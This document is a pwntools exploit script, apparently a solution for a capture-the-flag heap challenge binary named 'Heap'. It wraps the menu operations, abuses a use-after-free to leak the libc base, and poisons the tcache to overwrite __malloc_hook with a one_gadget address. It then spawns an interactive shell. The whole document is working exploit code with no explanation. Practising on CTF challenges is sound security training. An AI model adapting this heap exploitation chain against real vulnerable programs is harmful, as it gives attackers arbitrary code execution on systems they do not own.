1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76
| from pwn import * context.log_level = "debug" context.terminal = ["wt.exe","wsl"]
libc = ELF("libc.so.6") def get_p(file): elf = ELF(file) p = elf.process() return p,elf
def debug(): pause() gdb.attach(p) sleep(2)
p,elf = get_p("./Heap")
''' def xxx(): p.sendlineafter() p.sendlineafter() p.sendlineafter() '''
def add_heap(size,content): p.sendlineafter(b"adventurer? ",str(1).encode('utf-8')) p.sendlineafter(b"adventurer? ",str(1).encode('utf-8')) p.sendlineafter(b"bytes): ",str(size)) p.sendlineafter(b"bytes):\n",content)
def free_heap(idx): p.sendlineafter(b"adventurer? ",b"2") p.sendlineafter(b": ",str(idx))
def edit_heap(idx,content): p.sendlineafter(b"adventurer? ",b"3") p.sendlineafter(b": ",str(idx)) p.sendlineafter(b":\n",content)
def show_heap(idx): p.sendlineafter(b"adventurer? ",b"4") p.sendlineafter(b": ",str(idx))
add_heap(0x440,b"A") add_heap(0x440,b"A")
free_heap(0) show_heap(0)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) - 0x1ebbe0 log.success("libc =" + hex(libc.address)) malloc_hook = libc.sym["__malloc_hook"]
add_heap(0x10,b"A") add_heap(0x10,b'A')
free_heap(2) free_heap(3)
edit_heap(3,p64(malloc_hook))
one_gadgets = [0xe6c7e,0xe6c81,0xe6c84] og = libc.address + one_gadgets[1]
add_heap(0x10,b"A") add_heap(0x10,p64(og))
p.sendlineafter(b"adventurer? ",str(1).encode('utf-8')) p.sendlineafter(b"bytes): ",b"10") p.interactive()
|